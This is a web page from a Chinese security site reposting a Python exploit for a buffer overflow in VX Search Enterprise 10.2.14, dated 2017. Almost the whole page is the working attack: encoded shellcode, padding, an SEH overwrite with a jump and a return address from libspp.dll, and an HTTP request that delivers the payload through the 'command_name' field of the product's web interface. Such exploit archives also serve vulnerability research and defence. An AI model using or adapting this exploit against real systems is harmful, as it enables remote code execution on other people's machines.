首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VX Search 10.2.14 - 'command_name' Buffer Overflow
来源:@wolfieroot 作者:W01fier00t 发布时间:2017-12-06  
#!/usr/bin/python
 
 
print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"
 
# Exploit Title     : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
# Discovery by      : W01fier00t
# Twitter           : @wolfieroot
# Discovery Date    : 22/11/2017
# Software Link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Tested Version    : 10.2.14
# Tested on OS      : Windows 7 Home Edition sp1
# You will need to enable web server for this to work.
# You will also need the Login to VX Search wepage, for this to work.
 
import urllib
import urllib2
import socket
 
#Bad chars \x00\x0a\x0d
#Payload size: 351 bytes
shellcode = (
"\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36"
"\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66"
"\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0"
"\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37"
"\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42"
"\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b"
"\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07"
"\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9"
"\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94"
"\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7"
"\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda"
"\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56"
"\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85"
"\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74"
"\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1"
"\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe"
"\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab"
"\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57"
"\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde"
"\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e"
"\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3"
"\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f"
"\xc7\x24\x7d\x0c\xe7\x6c")
 
#0x1001a136 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll]
cmdname = "\x90" *16
cmdname += shellcode
cmdname += "A" * 157
cmdname += "\xEB\x06"
cmdname += "B" *2
cmdname += "\x36\xa1\x01\x10"
 
print " [*] Sending payload!..."
url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
values = {'command_name' : cmdname}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
 
try:
    response = urllib2.urlopen(req, timeout = 1)
except socket.timeout:
    pass
 
print " [*] DONE! :D\n"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·WinduCMS 3.1 - Local File Disc
·Abyss Web Server < 2.11.6 - He
·Artica Web Proxy 3.06 - Remote
·MistServer 2.12 - Cross-Site S
·WinduCMS 3.1 Local File Disclo
·SocuSoft Co. Photo 2 Video Con
·aws-cfn-bootstrap Local Code E
·HP iMC Plat 7.2 - Remote Code
·HP iMC Plat 7.2 - Remote Code
·Linux Kernel - 'The Huge Dirty
·Mac OS X Root Privilege Escala
·Asterisk 13.17.2~dfsg-2 Memory
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved